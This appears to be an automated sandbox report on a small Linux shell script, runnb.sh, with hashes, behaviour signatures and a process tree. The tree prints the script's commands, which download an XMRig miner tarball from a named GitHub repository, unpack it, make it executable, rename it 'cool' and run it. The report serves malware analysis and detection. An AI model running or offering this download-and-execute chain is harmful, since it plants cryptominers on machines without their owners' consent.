Analysis
- max time kernel: 117s
- max time network: 150s
- platform: debian-9_mips
- resource: debian9-mipsbe-20240611-en
- resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 30/10/2024, 13:06
Static task
- static1
Behavioral tasks
- behavioral1: sample runnb.sh, resource ubuntu1804-amd64-20240611-en
- behavioral2: sample runnb.sh, resource debian9-armhf-20240611-en
- behavioral3: sample runnb.sh, resource debian9-mipsbe-20240611-en
- behavioral4: sample runnb.sh, resource debian9-mipsel-20240611-en
General
- Target: runnb.sh
- Size: 213B
- MD5: a1189543e2f98f6696c6d857b899ab0a
- SHA1: 30b167128357a05cb5ae4d8bd386d63839d99c4d
- SHA256: a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
- SHA512: 472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef
Signatures
- File and Directory Permissions Modification (1 TTP, 1 IoC)
  Adversaries may modify file or directory permissions to evade defenses.
    PID   Process
    769   chmod
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching (1 TTP, 1 IoC)
  Abuse sudo or cached sudo credentials to execute code.
    PID   Process
    712   sudo
- Reads CPU attributes (1 TTP, 2 IoCs)
    Description               IoC                              Process
    File opened for reading   /sys/devices/system/cpu/online   exim4
    File opened for reading   /sys/devices/system/cpu/online   exim4
- Reads runtime system information
    Description               IoC                              Process
    File opened for reading   /proc/self/stat                  sudo
    File opened for reading   /proc/filesystems                dpkg
    File opened for reading   /proc/self/fd                    apt
    File opened for reading   /proc/filesystems                dpkg
    File opened for reading   /proc/filesystems                mv
    File opened for reading   /proc/filesystems                sudo
    File opened for reading   /proc/sys/kernel/ngroups_max     sendmail
    File opened for reading   /proc/sys/kernel/ngroups_max     sendmail
    File opened for reading   /proc/self/fd                    apt
    File opened for reading   /proc/filesystems                dpkg
    File opened for reading   /proc/filesystems                dpkg
    File opened for reading   /proc/self/fd                    sudo
    File opened for reading   /proc/filesystems                tar
    File opened for reading   /proc/sys/kernel/ngroups_max     sudo
- Writes file to tmp directory (8 IoCs)
  Malware often drops required files in the /tmp directory.
    Description                    IoC                            Process
    File opened for modification   /tmp/fileutl.message.0ksS1M    apt
    File opened for modification   /tmp/fileutl.message.9MdXSo    apt
    File opened for modification   /tmp/fileutl.message.SpDNgo    apt
    File opened for modification   /tmp/fileutl.message.UkZHET    apt
    File opened for modification   /tmp/fileutl.message.Cby9mA    apt
    File opened for modification   /tmp/fileutl.message.ObiKey    apt
    File opened for modification   /tmp/fileutl.message.4SnVT5    apt
    File opened for modification   /tmp/fileutl.message.ChveDP    apt
Processes
- /tmp/runnb.sh (PID 707)
  command line: /tmp/runnb.sh
  - /usr/bin/sudo (PID 712)
    command line: sudo apt install wget
    signatures: Abuse Elevation Control Mechanism: Sudo and Sudo Caching; Reads runtime system information
    - /usr/sbin/sendmail (PID 721)
      command line: sendmail -t
      signatures: Reads runtime system information
      - /usr/sbin/exim4 (PID 744)
        command line: /usr/sbin/exim4 -Mc 1t67Wi-0000Bd-5p
        signatures: Reads CPU attributes
    - /usr/sbin/sendmail (PID 724)
      command line: sendmail -t
      signatures: Reads runtime system information
      - /usr/sbin/exim4 (PID 736)
        command line: /usr/sbin/exim4 -Mc 1t67Wc-0000Bg-PL
        signatures: Reads CPU attributes
    - /usr/bin/apt (PID 727)
      command line: apt install wget
      signatures: Reads runtime system information; Writes file to tmp directory
      - /usr/bin/dpkg (PID 734)
        command line: /usr/bin/dpkg --print-foreign-architectures
        signatures: Reads runtime system information
      - /usr/bin/dpkg (PID 741)
        command line: /usr/bin/dpkg --print-foreign-architectures
        signatures: Reads runtime system information
  - /usr/bin/apt (PID 764)
    command line: apt install wget
    signatures: Reads runtime system information; Writes file to tmp directory
    - /usr/bin/dpkg (PID 765)
      command line: /usr/bin/dpkg --print-foreign-architectures
      signatures: Reads runtime system information
    - /usr/bin/dpkg (PID 766)
      command line: /usr/bin/dpkg --print-foreign-architectures
      signatures: Reads runtime system information
  - /usr/bin/wget (PID 767)
    command line: wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz
  - /bin/tar (PID 768)
    command line: tar xvf xmrigtar.tar.gz
    signatures: Reads runtime system information
  - /bin/chmod (PID 769)
    command line: chmod +x xmrig
    signatures: File and Directory Permissions Modification
  - /bin/mv (PID 770)
    command line: mv xmrig cool
    signatures: Reads runtime system information
  - /tmp/cool (PID 771)
    command line: ./cool
MITRE ATT&CK Enterprise v15
Downloads